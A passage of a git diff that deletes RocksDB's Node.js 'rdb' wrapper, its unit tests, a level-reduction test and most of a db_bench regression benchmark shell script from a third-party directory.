-    target_level = (int)(options->Get(
-        String::NewSymbol("target_level"))->ToInt32()->Value());
-
-    if (options->Has(String::NewSymbol("target_path_id")) ||
-        options->Get(String::NewSymbol("target_path_id"))->IsInt32()) {
-      target_path_id = (int)(options->Get(
-          String::NewSymbol("target_path_id"))->ToInt32()->Value());
-    }
-  }
-
-  db_wrapper->status_ = db_wrapper->db_->CompactRange(
-    &begin, &end, true, target_level, target_path_id
-  );
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::CompactAll(const Arguments& args) {
-  HandleScope scope;
-
-  if (!args[2]->IsObject() || !args[3]->IsString()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  rocksdb::Slice begin  = *v8::String::Utf8Value(args[0]->ToString());
-  rocksdb::Slice end    = *v8::String::Utf8Value(args[1]->ToString());
-  Local<Object> options = args[2]->ToObject();
-  std::string cf        = *v8::String::Utf8Value(args[3]->ToString());
-
-  int target_level = -1, target_path_id = 0;
-
-  if (options->Has(String::NewSymbol("target_level")) &&
-      options->Get(String::NewSymbol("target_level"))->IsInt32()) {
-    target_level = (int)(options->Get(
-        String::NewSymbol("target_level"))->ToInt32()->Value());
-
-    if (options->Has(String::NewSymbol("target_path_id")) ||
-        options->Get(String::NewSymbol("target_path_id"))->IsInt32()) {
-      target_path_id = (int)(options->Get(
-          String::NewSymbol("target_path_id"))->ToInt32()->Value());
-    }
-  }
-
-  db_wrapper->status_ = db_wrapper->db_->CompactRange(
-    db_wrapper->columnFamilies_[cf], &begin, &end, true, target_level,
-    target_path_id);
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::CompactRange(const Arguments& args) {
-  HandleScope scope;
-
-  if (!args[0]->IsString() || !args[1]->IsString()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  switch(args.Length()) {
-  case 2:
-    return CompactRangeDefault(args);
-  case 3:
-    return args[2]->IsString() ? CompactColumnFamily(args) :
-        CompactOptions(args);
-  default:
-    return CompactAll(args);
-  }
-}
-
-Handle<Value> DBWrapper::Close(const Arguments& args) {
-  HandleScope scope;
-
-  delete ObjectWrap::Unwrap<DBWrapper>(args.This());
-
-  return scope.Close(Null());
-}
diff --git a/thirdparty/rocksdb/tools/rdb/db_wrapper.h b/thirdparty/rocksdb/tools/rdb/db_wrapper.h
deleted file mode 100644
index 9d1c8f8..0000000
--- a/thirdparty/rocksdb/tools/rdb/db_wrapper.h
+++ /dev/null
@@ -1,58 +0,0 @@
-#ifndef DBWRAPPER_H
-#define DBWRAPPER_H
-
-#include <map>
-#include <node.h>
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/options.h"
-
-using namespace v8;
-
-// Used to encapsulate a particular instance of an opened database.
-//
-// This object should not be used directly in C++; it exists solely to provide
-// a mapping from a JavaScript object to a C++ code that can use the RocksDB
-// API.
-class DBWrapper : public node::ObjectWrap {
-  public:
-    static void Init(Handle<Object> exports);
-
-  private:
-    explicit DBWrapper();
-    ~DBWrapper();
-
-    // Helper methods
-    static bool HasFamilyNamed(std::string& name, DBWrapper* db);
-    static bool AddToBatch(rocksdb::WriteBatch& batch, bool del,
-        Handle<Array> array);
-    static bool AddToBatch(rocksdb::WriteBatch& batch, bool del,
-        Handle<Array> array, DBWrapper* db_wrapper, std::string cf);
-    static Handle<Value> CompactRangeDefault(const v8::Arguments& args);
-    static Handle<Value> CompactColumnFamily(const Arguments& args);
-    static Handle<Value> CompactOptions(const Arguments& args);
-    static Handle<Value> CompactAll(const Arguments& args);
-
-    // C++ mappings of API methods
-    static Persistent<v8::Function> constructor;
-    static Handle<Value> Open(const Arguments& args);
-    static Handle<Value> New(const Arguments& args);
-    static Handle<Value> Get(const Arguments& args);
-    static Handle<Value> Put(const Arguments& args);
-    static Handle<Value> Delete(const Arguments& args);
-    static Handle<Value> Dump(const Arguments& args);
-    static Handle<Value> WriteBatch(const Arguments& args);
-    static Handle<Value> CreateColumnFamily(const Arguments& args);
-    static Handle<Value> CompactRange(const Arguments& args);
-    static Handle<Value> Close(const Arguments& args);
-
-    // Internal fields
-    rocksdb::Options options_;
-    rocksdb::Status status_;
-    rocksdb::DB* db_;
-    std::unordered_map<std::string, rocksdb::ColumnFamilyHandle*>
-        columnFamilies_;
-};
-
-#endif
diff --git a/thirdparty/rocksdb/tools/rdb/rdb b/thirdparty/rocksdb/tools/rdb/rdb
deleted file mode 100755
index 05da115..0000000
--- a/thirdparty/rocksdb/tools/rdb/rdb
+++ /dev/null
@@ -1,3 +0,0 @@
-#!/usr/bin/env bash
-
-node -e "RDB = require('./build/Release/rdb').DBWrapper; console.log('Loaded rocksdb in variable RDB'); repl = require('repl').start('> ');"
diff --git a/thirdparty/rocksdb/tools/rdb/rdb.cc b/thirdparty/rocksdb/tools/rdb/rdb.cc
deleted file mode 100644
index 3619dc7..0000000
--- a/thirdparty/rocksdb/tools/rdb/rdb.cc
+++ /dev/null
@@ -1,15 +0,0 @@
-#ifndef BUILDING_NODE_EXTENSION
-#define BUILDING_NODE_EXTENSION
-#endif
-
-#include <node.h>
-#include <v8.h>
-#include "db/_wrapper.h"
-
-using namespace v8;
-
-void InitAll(Handle<Object> exports) {
-  DBWrapper::Init(exports);
-}
-
-NODE_MODULE(rdb, InitAll)
diff --git a/thirdparty/rocksdb/tools/rdb/unit_test.js b/thirdparty/rocksdb/tools/rdb/unit_test.js
deleted file mode 100644
index d74ee8c..0000000
--- a/thirdparty/rocksdb/tools/rdb/unit_test.js
+++ /dev/null
@@ -1,124 +0,0 @@
-assert = require('assert')
-RDB    = require('./build/Release/rdb').DBWrapper
-exec   = require('child_process').exec
-util   = require('util')
-
-DB_NAME = '/tmp/rocksdbtest-' + process.getuid()
-
-a = RDB()
-assert.equal(a.open(DB_NAME, ['b']), false)
-
-exec(
-    util.format(
-        "node -e \"RDB = require('./build/Release/rdb').DBWrapper; \
-        a = RDB('%s'); a.createColumnFamily('b')\"",
-        DB_NAME
-    ).exitCode, null
-)
-
-
-exec(
-    util.format(
-        "node -e \"RDB = require('./build/Release/rdb').DBWrapper; \
-        a = RDB('%s', ['b'])\"",
-        DB_NAME
-    ).exitCode, null
-)
-
-exec('rm -rf ' + DB_NAME)
-
-a = RDB()
-assert.equal(a.open(DB_NAME, ['a']), false)
-assert(a.open(DB_NAME), true)
-assert(a.createColumnFamily('temp'))
-
-b = RDB()
-assert.equal(b.open(DB_NAME), false)
-
-exec('rm -rf ' + DB_NAME)
-
-DB_NAME += 'b'
-
-a = RDB()
-assert(a.open(DB_NAME))
-assert.equal(a.constructor.name, 'DBWrapper')
-assert.equal(a.createColumnFamily(), false)
-assert.equal(a.createColumnFamily(1), false)
-assert.equal(a.createColumnFamily(['']), false)
-assert(a.createColumnFamily('b'))
-assert.equal(a.createColumnFamily('b'), false)
-
-// Get and Put
-assert.equal(a.get(1), null)
-assert.equal(a.get(['a']), null)
-assert.equal(a.get('a', 1), null)
-assert.equal(a.get(1, 'a'), null)
-assert.equal(a.get(1, 1), null)
-
-assert.equal(a.put(1), false)
-assert.equal(a.put(['a']), false)
-assert.equal(a.put('a', 1), false)
-assert.equal(a.put(1, 'a'), false)
-assert.equal(a.put(1, 1), false)
-assert.equal(a.put('a', 'a', 1), false)
-assert.equal(a.put('a', 1, 'a'), false)
-assert.equal(a.put(1, 'a', 'a'), false)
-assert.equal(a.put('a', 1, 1), false)
-assert.equal(a.put(1, 'a', 1), false)
-assert.equal(a.put(1, 1, 'a'), false)
-assert.equal(a.put(1, 1, 1), false)
-
-
-assert.equal(a.get(), null)
-assert.equal(a.get('a'), null)
-assert.equal(a.get('a', 'c'), null)
-assert.equal(a.put(), false)
-assert.equal(a.put('a'), false)
-assert.equal(a.get('a', 'b', 'c'), null)
-
-assert(a.put('a', 'axe'))
-assert(a.put('a', 'first'))
-assert.equal(a.get('a'), 'first')
-assert.equal(a.get('a', 'b'), null)
-assert.equal(a.get('a', 'c'), null)
-
-assert(a.put('a', 'apple', 'b'))
-assert.equal(a.get('a', 'b'), 'apple')
-assert.equal(a.get('a'), 'first')
-assert(a.put('b', 'butter', 'b'), 'butter')
-assert(a.put('b', 'banana', 'b'))
-assert.equal(a.get('b', 'b'), 'banana')
-assert.equal(a.get('b'), null)
-assert.equal(a.get('b', 'c'), null)
-
-// Delete
-assert.equal(a.delete(1), false)
-assert.equal(a.delete('a', 1), false)
-assert.equal(a.delete(1, 'a'), false)
-assert.equal(a.delete(1, 1), false)
-
-assert.equal(a.delete('b'), true)
-assert(a.delete('a'))
-assert.equal(a.get('a'), null)
-assert.equal(a.get('a', 'b'), 'apple')
-assert.equal(a.delete('c', 'c'), false)
-assert.equal(a.delete('c', 'b'), true)
-assert(a.delete('b', 'b'))
-assert.equal(a.get('b', 'b'), null)
-
-// Dump
-console.log("MARKER 1")
-assert(a.dump())
-console.log("Should be no output between 'MARKER 1' and here\n")
-console.log('Next line should be "a" => "apple"')
-assert(a.dump('b'))
-
-console.log("\nMARKER 2")
-assert.equal(a.dump('c'), false)
-console.log("Should be no output between 'MARKER 2' and here\n")
-
-// WriteBatch
-
-
-// Clean up test database
-exec('rm -rf ' + DB_NAME)
diff --git a/thirdparty/rocksdb/tools/reduce_levels_test.cc b/thirdparty/rocksdb/tools/reduce_levels_test.cc
deleted file mode 100644
index 7fe38bf..0000000
--- a/thirdparty/rocksdb/tools/reduce_levels_test.cc
+++ /dev/null
@@ -1,218 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-
-#include "db/db_impl.h"
-#include "db/version_set.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/ldb_cmd.h"
-#include "tools/ldb_cmd_impl.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class ReduceLevelTest : public testing::Test {
-public:
-  ReduceLevelTest() {
-    dbname_ = test::TmpDir() + "/db_reduce_levels_test";
-    DestroyDB(dbname_, Options());
-    db_ = nullptr;
-  }
-
-  Status OpenDB(bool create_if_missing, int levels);
-
-  Status Put(const std::string& k, const std::string& v) {
-    return db_->Put(WriteOptions(), k, v);
-  }
-
-  std::string Get(const std::string& k) {
-    ReadOptions options;
-    std::string result;
-    Status s = db_->Get(options, k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-  Status Flush() {
-    if (db_ == nullptr) {
-      return Status::InvalidArgument("DB not opened.");
-    }
-    DBImpl* db_impl = reinterpret_cast<DBImpl*>(db_);
-    return db_impl->TEST_FlushMemTable();
-  }
-
-  void MoveL0FileToLevel(int level) {
-    DBImpl* db_impl = reinterpret_cast<DBImpl*>(db_);
-    for (int i = 0; i < level; ++i) {
-      ASSERT_OK(db_impl->TEST_CompactRange(i, nullptr, nullptr));
-    }
-  }
-
-  void CloseDB() {
-    if (db_ != nullptr) {
-      delete db_;
-      db_ = nullptr;
-    }
-  }
-
-  bool ReduceLevels(int target_level);
-
-  int FilesOnLevel(int level) {
-    std::string property;
-    EXPECT_TRUE(db_->GetProperty(
-        "rocksdb.num-files-at-level" + NumberToString(level), &property));
-    return atoi(property.c_str());
-  }
-
-private:
-  std::string dbname_;
-  DB* db_;
-};
-
-Status ReduceLevelTest::OpenDB(bool create_if_missing, int num_levels) {
-  rocksdb::Options opt;
-  opt.num_levels = num_levels;
-  opt.create_if_missing = create_if_missing;
-  rocksdb::Status st = rocksdb::DB::Open(opt, dbname_, &db_);
-  if (!st.ok()) {
-    fprintf(stderr, "Can't open the db:%s\n", st.ToString().c_str());
-  }
-  return st;
-}
-
-bool ReduceLevelTest::ReduceLevels(int target_level) {
-  std::vector<std::string> args = rocksdb::ReduceDBLevelsCommand::PrepareArgs(
-      dbname_, target_level, false);
-  LDBCommand* level_reducer = LDBCommand::InitFromCmdLineArgs(
-      args, Options(), LDBOptions(), nullptr, LDBCommand::SelectCommand);
-  level_reducer->Run();
-  bool is_succeed = level_reducer->GetExecuteState().IsSucceed();
-  delete level_reducer;
-  return is_succeed;
-}
-
-TEST_F(ReduceLevelTest, Last_Level) {
-  ASSERT_OK(OpenDB(true, 4));
-  ASSERT_OK(Put("aaaa", "11111"));
-  Flush();
-  MoveL0FileToLevel(3);
-  ASSERT_EQ(FilesOnLevel(3), 1);
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(3));
-  ASSERT_OK(OpenDB(true, 3));
-  ASSERT_EQ(FilesOnLevel(2), 1);
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(2));
-  ASSERT_OK(OpenDB(true, 2));
-  ASSERT_EQ(FilesOnLevel(1), 1);
-  CloseDB();
-}
-
-TEST_F(ReduceLevelTest, Top_Level) {
-  ASSERT_OK(OpenDB(true, 5));
-  ASSERT_OK(Put("aaaa", "11111"));
-  Flush();
-  ASSERT_EQ(FilesOnLevel(0), 1);
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(4));
-  ASSERT_OK(OpenDB(true, 4));
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(3));
-  ASSERT_OK(OpenDB(true, 3));
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(2));
-  ASSERT_OK(OpenDB(true, 2));
-  CloseDB();
-}
-
-TEST_F(ReduceLevelTest, All_Levels) {
-  ASSERT_OK(OpenDB(true, 5));
-  ASSERT_OK(Put("a", "a11111"));
-  ASSERT_OK(Flush());
-  MoveL0FileToLevel(4);
-  ASSERT_EQ(FilesOnLevel(4), 1);
-  CloseDB();
-
-  ASSERT_OK(OpenDB(true, 5));
-  ASSERT_OK(Put("b", "b11111"));
-  ASSERT_OK(Flush());
-  MoveL0FileToLevel(3);
-  ASSERT_EQ(FilesOnLevel(3), 1);
-  ASSERT_EQ(FilesOnLevel(4), 1);
-  CloseDB();
-
-  ASSERT_OK(OpenDB(true, 5));
-  ASSERT_OK(Put("c", "c11111"));
-  ASSERT_OK(Flush());
-  MoveL0FileToLevel(2);
-  ASSERT_EQ(FilesOnLevel(2), 1);
-  ASSERT_EQ(FilesOnLevel(3), 1);
-  ASSERT_EQ(FilesOnLevel(4), 1);
-  CloseDB();
-
-  ASSERT_OK(OpenDB(true, 5));
-  ASSERT_OK(Put("d", "d11111"));
-  ASSERT_OK(Flush());
-  MoveL0FileToLevel(1);
-  ASSERT_EQ(FilesOnLevel(1), 1);
-  ASSERT_EQ(FilesOnLevel(2), 1);
-  ASSERT_EQ(FilesOnLevel(3), 1);
-  ASSERT_EQ(FilesOnLevel(4), 1);
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(4));
-  ASSERT_OK(OpenDB(true, 4));
-  ASSERT_EQ("a11111", Get("a"));
-  ASSERT_EQ("b11111", Get("b"));
-  ASSERT_EQ("c11111", Get("c"));
-  ASSERT_EQ("d11111", Get("d"));
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(3));
-  ASSERT_OK(OpenDB(true, 3));
-  ASSERT_EQ("a11111", Get("a"));
-  ASSERT_EQ("b11111", Get("b"));
-  ASSERT_EQ("c11111", Get("c"));
-  ASSERT_EQ("d11111", Get("d"));
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(2));
-  ASSERT_OK(OpenDB(true, 2));
-  ASSERT_EQ("a11111", Get("a"));
-  ASSERT_EQ("b11111", Get("b"));
-  ASSERT_EQ("c11111", Get("c"));
-  ASSERT_EQ("d11111", Get("d"));
-  CloseDB();
-}
-
-}
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as LDBCommand is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/regression_test.sh b/thirdparty/rocksdb/tools/regression_test.sh
deleted file mode 100755
index 58558bb..0000000
--- a/thirdparty/rocksdb/tools/regression_test.sh
+++ /dev/null
@@ -1,460 +0,0 @@
-#!/usr/bin/env bash
-# The RocksDB regression test script.
-# REQUIREMENT: must be able to run make db_bench in the current directory
-#
-# This script will do the following things in order:
-#
-# 1. check out the specified rocksdb commit.
-# 2. build db_bench using the specified commit
-# 3. setup test directory $TEST_PATH.  If not specified, then the test directory
-#    will be "/tmp/rocksdb/regression_test"
-# 4. run set of benchmarks on the specified host
-#    (can be either locally or remotely)
-# 5. generate report in the $RESULT_PATH.  If RESULT_PATH is not specified,
-#    RESULT_PATH will be set to $TEST_PATH/current_time
-#
-# = Examples =
-# * Run the regression test using rocksdb commit abcdef that outputs results
-#   and temp files in "/my/output/dir"
-#r
-#   TEST_PATH=/my/output/dir COMMIT_ID=abcdef ./tools/regression_test.sh
-#
-# * Run the regression test on a remost host under "/my/output/dir" directory
-#   and stores the result locally in "/my/benchmark/results" using commit
-#   abcdef and with the rocksdb options specified in /my/path/to/OPTIONS-012345
-#   with 1000000000 keys in each benchmark in the regression test where each
-#   key and value are 100 and 900 bytes respectively:
-#
-#   REMOTE_USER_AT_HOST=yhchiang@my.remote.host \
-#       TEST_PATH=/my/output/dir \
-#       RESULT_PATH=/my/benchmark/results \
-#       COMMIT_ID=abcdef \
-#       OPTIONS_FILE=/my/path/to/OPTIONS-012345 \
-#       NUM_KEYS=1000000000 \
-#       KEY_SIZE=100 \
-#       VALUE_SIZE=900 \
-#       ./tools/regression_test.sh
-#
-# = Regression test environmental parameters =
-#   DEBUG: If true, then the script will not checkout master and build db_bench
-#       if db_bench already exists
-#       Default: 0
-#   TEST_MODE: If 1, run fillseqdeterminstic and benchmarks both
-#       if 0, only run fillseqdeterministc
-#       if 2, only run benchmarks
-#       Default: 1
-#   TEST_PATH: the root directory of the regression test.
-#       Default: "/tmp/rocksdb/regression_test"
-#   RESULT_PATH: the directory where the regression results will be generated.
-#       Default: "$TEST_PATH/current_time"
-#   REMOTE_USER_AT_HOST: If set, then test will run on the specified host under
-#       TEST_PATH directory and outputs test results locally in RESULT_PATH
-#       The REMOTE_USER_AT_HOST should follow the format user-id@host.name
-#   DB_PATH: the path where the rocksdb database will be created during the
-#       regression test.  Default:  $TEST_PATH/db
-#   WAL_PATH: the path where the rocksdb WAL will be outputed.
-#       Default:  $TEST_PATH/wal
-#   OPTIONS_FILE:  If specified, then the regression test will use the specified
-#       file to initialize the RocksDB options in its benchmarks.  Note that
-#       this feature only work for commits after 88acd93 or rocksdb version
-#       later than 4.9.
-#   DELETE_TEST_PATH: If true, then the test directory will be deleted
-#       after the script ends.
-#       Default: 0
-#
-# = db_bench parameters =
-#   NUM_THREADS:  The number of concurrent foreground threads that will issue
-#       database operations in the benchmark.  Default: 16.
-#   NUM_KEYS:  The key range that will be used in the entire regression test.
-#       Default: 1G.
-#   NUM_OPS:  The number of operations (reads, writes, or deletes) that will
-#       be issued in EACH thread.
-#       Default: $NUM_KEYS / $NUM_THREADS
-#   KEY_SIZE:  The size of each key in bytes in db_bench.  Default: 100.
-#   VALUE_SIZE:  The size of each value in bytes in db_bench.  Default: 900.
-#   CACHE_SIZE:  The size of RocksDB block cache used in db_bench.  Default: 1G
-#   STATISTICS:  If 1, then statistics is on in db_bench.  Default: 0.
-#   COMPRESSION_RATIO:  The compression ratio of the key generated in db_bench.
-#       Default: 0.5.
-#   HISTOGRAM:  If 1, then the histogram feature on performance feature is on.
-#   STATS_PER_INTERVAL:  If 1, then the statistics will be reported for every
-#       STATS_INTERVAL_SECONDS seconds.  Default 1.
-#   STATS_INTERVAL_SECONDS:  If STATS_PER_INTERVAL is set to 1, then statistics
-#       will be reported for every STATS_INTERVAL_SECONDS.  Default 60.
-#   MAX_BACKGROUND_FLUSHES:  The maxinum number of concurrent flushes in
-#       db_bench.  Default: 4.
-#   MAX_BACKGROUND_COMPACTIONS:  The maximum number of concurrent compactions
-#       in db_bench.  Default: 16.
-#   SEEK_NEXTS:  Controls how many Next() will be called after seek.
-#       Default: 10.
-#   SEED:  random seed that controls the randomness of the benchmark.
-#       Default: $( date +%s )
-
-#==============================================================================
-#  CONSTANT
-#==============================================================================
-TITLE_FORMAT="%40s,%25s,%30s,%7s,%9s,%8s,"
-TITLE_FORMAT+="%10s,%13s,%14s,%11s,%12s,"
-TITLE_FORMAT+="%7s,%11s,"
-TITLE_FORMAT+="%9s,%10s,%10s,%10s,%10s,%10s,%5s,"
-TITLE_FORMAT+="%5s,%5s,%5s" # time
-TITLE_FORMAT+="\n"
-
-DATA_FORMAT="%40s,%25s,%30s,%7s,%9s,%8s,"
-DATA_FORMAT+="%10s,%13.0f,%14s,%11s,%12s,"
-DATA_FORMAT+="%7s,%11s,"
-DATA_FORMAT+="%9.0f,%10.0f,%10.0f,%10.0f,%10.0f,%10.0f,%5.0f,"
-DATA_FORMAT+="%5.0f,%5.0f,%5.0f" # time
-DATA_FORMAT+="\n"
-
-MAIN_PATTERN="$1""[[:blank:]]+:.*[[:blank:]]+([0-9\.]+)[[:blank:]]+ops/sec"
-PERC_PATTERN="Percentiles: P50: ([0-9\.]+) P75: ([0-9\.]+) "
-PERC_PATTERN+="P99: ([0-9\.]+) P99.9: ([0-9\.]+) P99.99: ([0-9\.]+)"
-#==============================================================================
-
-function main {
-  TEST_ROOT_DIR=${TEST_PATH:-"/tmp/rocksdb/regression_test"}
-  init_arguments $TEST_ROOT_DIR
-
-  build_db_bench_and_ldb
-
-  setup_test_directory
-  if [ $TEST_MODE -le 1 ]; then
-      tmp=$DB_PATH
-      DB_PATH=$ORIGIN_PATH
-      test_remote "test -d $DB_PATH"
-      if [[ $? -ne 0 ]]; then
-          echo "Building DB..."
-          # compactall alone will not print ops or threads, which will fail update_report
-          run_db_bench "fillseq,compactall" $NUM_KEYS 1 0 0
-      fi
-      DB_PATH=$tmp
-  fi
-  if [ $TEST_MODE -ge 1 ]; then
-      build_checkpoint
-      run_db_bench "readrandom"
-      run_db_bench "readwhilewriting"
-      run_db_bench "deleterandom" $((NUM_KEYS / 10 / $NUM_THREADS))
-      run_db_bench "seekrandom"
-      run_db_bench "seekrandomwhilewriting"
-  fi
-
-  cleanup_test_directory $TEST_ROOT_DIR
-  echo ""
-  echo "Benchmark completed!  Results are available in $RESULT_PATH"
-}
-
-############################################################################
-function init_arguments {
-  K=1024
-  M=$((1024 * K))
-  G=$((1024 * M))
-
-  current_time=$(date +"%F-%H:%M:%S")
-  RESULT_PATH=${RESULT_PATH:-"$1/results/$current_time"}
-  COMMIT_ID=`git log | head -n1 | cut -c 8-`
-  SUMMARY_FILE="$RESULT_PATH/SUMMARY.csv"
-
-  DB_PATH=${3:-"$1/db"}
-  ORIGIN_PATH=${ORIGIN_PATH:-"$(dirname $(dirname $DB_PATH))/db"}
-  WAL_PATH=${4:-""}
-  if [ -z "$REMOTE_USER_AT_HOST" ]; then
-    DB_BENCH_DIR=${5:-"."}
-  else
-    DB_BENCH_DIR=${5:-"$1/db_bench"}
-  fi
-
-  DEBUG=${DEBUG:-0}
-  TEST_MODE=${TEST_MODE:-1}
-  SCP=${SCP:-"scp"}
-  SSH=${SSH:-"ssh"}
-  NUM_THREADS=${NUM_THREADS:-16}
-  NUM_KEYS=${NUM_KEYS:-$((1 * G))}  # key range
-  NUM_OPS=${NUM_OPS:-$(($NUM_KEYS / $NUM_THREADS))}
-  KEY_SIZE=${KEY_SIZE:-100}
-  VALUE_SIZE=${VALUE_SIZE:-900}
-  CACHE_SIZE=${CACHE_SIZE:-$((1 * G))}
-  STATISTICS=${STATISTICS:-0}
-  COMPRESSION_RATIO=${COMPRESSION_RATIO:-0.5}
-  HISTOGRAM=${HISTOGRAM:-1}
-  NUM_MULTI_DB=${NUM_MULTI_DB:-1}
-  STATS_PER_INTERVAL=${STATS_PER_INTERVAL:-1}
-  STATS_INTERVAL_SECONDS=${STATS_INTERVAL_SECONDS:-600}
-  MAX_BACKGROUND_FLUSHES=${MAX_BACKGROUND_FLUSHES:-4}
-  MAX_BACKGROUND_COMPACTIONS=${MAX_BACKGROUND_COMPACTIONS:-16}
-  DELETE_TEST_PATH=${DELETE_TEST_PATH:-0}
-  SEEK_NEXTS=${SEEK_NEXTS:-10}
-  SEED=${SEED:-$( date +%s )}
-}
-
-# $1 --- benchmark name
-# $2 --- number of operations.  Default: $NUM_KEYS
-# $3 --- number of threads.  Default $NUM_THREADS
-# $4 --- use_existing_db.  Default: 1
-# $5 --- update_report. Default: 1
-function run_db_bench {
-  # this will terminate all currently-running db_bench
-  find_db_bench_cmd="ps aux | grep db_bench | grep -v grep | grep -v aux | awk '{print \$2}'"
-
-  ops=${2:-$NUM_OPS}
-  threads=${3:-$NUM_THREADS}
-  USE_EXISTING_DB=${4:-1}
-  UPDATE_REPORT=${5:-1}
-  echo ""
-  echo "======================================================================="
-  echo "Benchmark $1"
-  echo "======================================================================="
-  echo ""
-  db_bench_error=0
-  options_file_arg=$(setup_options_file)
-  echo "$options_file_arg"
-  # use `which time` to avoid using bash's internal time command
-  db_bench_cmd="("'\$(which time)'" -p $DB_BENCH_DIR/db_bench \
-      --benchmarks=$1 --db=$DB_PATH --wal_dir=$WAL_PATH \
-      --use_existing_db=$USE_EXISTING_DB \
-      --disable_auto_compactions \
-      --threads=$threads \
-      --num=$NUM_KEYS \
-      --reads=$ops \
-      --writes=$ops \
-      --deletes=$ops \
-      --key_size=$KEY_SIZE \
-      --value_size=$VALUE_SIZE \
-      --cache_size=$CACHE_SIZE \
-      --statistics=$STATISTICS \
-      $options_file_arg \
-      --compression_ratio=$COMPRESSION_RATIO \
-      --histogram=$HISTOGRAM \
-      --seek_nexts=$SEEK_NEXTS \
-      --stats_per_interval=$STATS_PER_INTERVAL \
-      --stats_interval_seconds=$STATS_INTERVAL_SECONDS \
-      --max_background_flushes=$MAX_BACKGROUND_FLUSHES \
-      --num_multi_db=$NUM_MULTI_DB \
-      --max_background_compactions=$MAX_BACKGROUND_COMPACTIONS \
-      --seed=$SEED) 2>&1"
-  ps_cmd="ps aux"
-  if ! [ -z "$REMOTE_USER_AT_HOST" ]; then
-    echo "Running benchmark remotely on $REMOTE_USER_AT_HOST"
-    db_bench_cmd="$SSH $REMOTE_USER_AT_HOST \"$db_bench_cmd\""
-    ps_cmd="$SSH $REMOTE_USER_AT_HOST $ps_cmd"
-  fi
-
-  ## make sure no db_bench is running
-  # The following statement is necessary make sure "eval $ps_cmd" will success.
-  # Otherwise, if we simply check whether "$(eval $ps_cmd | grep db_bench)" is
-  # successful or not, then it will always be false since grep will return
-  # non-zero status when there's no matching output.
-  ps_output="$(eval $ps_cmd)"
-  exit_on_error $? "$ps_cmd"
-
-  # perform the actual command to check whether db_bench is running
-  grep_output="$(eval $ps_cmd | grep db_bench | grep -v grep)"
-  if [ "$grep_output" != "" ]; then
-    echo "Stopped regression_test.sh as there're still db_bench processes running:"
-    echo $grep_output
-    echo "Clean up test directory"
-    cleanup_test_directory $TEST_ROOT_DIR
-    exit 2
-  fi
-
-  ## run the db_bench
-  cmd="($db_bench_cmd || db_bench_error=1) | tee -a $RESULT_PATH/$1"
-  exit_on_error $?
-  echo $cmd
-  eval $cmd
-  exit_on_error $db_bench_error
-  if [ $UPDATE_REPORT -ne 0 ]; then
-    update_report "$1" "$RESULT_PATH/$1" $ops $threads
-  fi
-}
-
-function build_checkpoint {
-    cmd_prefix=""
-    if ! [ -z "$REMOTE_USER_AT_HOST" ]; then
-        cmd_prefix="$SSH $REMOTE_USER_AT_HOST "
-    fi
-    if [ $NUM_MULTI_DB -gt 1 ]; then
-        dirs=$($cmd_prefix find $ORIGIN_PATH -type d -links 2)
-        for dir in $dirs; do
-            db_index=$(basename $dir)
-            echo "Building checkpoints: $ORIGIN_PATH/$db_index -> $DB_PATH/$db_index ..."
-            $cmd_prefix $DB_BENCH_DIR/ldb checkpoint --checkpoint_dir=$DB_PATH/$db_index \
-                        --db=$ORIGIN_PATH/$db_index 2>&1
-        done
-    else
-        # checkpoint cannot build in directory already exists
-        $cmd_prefix rm -rf $DB_PATH
-        echo "Building checkpoint: $ORIGIN_PATH -> $DB_PATH ..."
-        $cmd_prefix $DB_BENCH_DIR/ldb checkpoint --checkpoint_dir=$DB_PATH \
-                    --db=$ORIGIN_PATH 2>&1
-    fi
-}
-
-function multiply {
-  echo "$1 * $2" | bc
-}
-
-# $1 --- name of the benchmark
-# $2 --- the filename of the output log of db_bench
-function update_report {
-  main_result=`cat $2 | grep $1`
-  exit_on_error $?
-  perc_statement=`cat $2 | grep Percentile`
-  exit_on_error $?
-
-  # Obtain micros / op
-
-  [[ $main_result =~ $MAIN_PATTERN ]]
-  ops_per_s=${BASH_REMATCH[1]}
-
-  # Obtain percentile information
-  [[ $perc_statement =~ $PERC_PATTERN ]]
-  perc[0]=${BASH_REMATCH[1]}  # p50
-  perc[1]=${BASH_REMATCH[2]}  # p75
-  perc[2]=${BASH_REMATCH[3]}  # p99
-  perc[3]=${BASH_REMATCH[4]}  # p99.9
-  perc[4]=${BASH_REMATCH[5]}  # p99.99
-
-  # Parse the output of the time command
-  real_sec=`tail -3 $2 | grep real | awk '{print $2}'`
-  user_sec=`tail -3 $2 | grep user | awk '{print $2}'`
-  sys_sec=`tail -3 $2 | grep sys | awk '{print $2}'`
-
-  (printf "$DATA_FORMAT" \
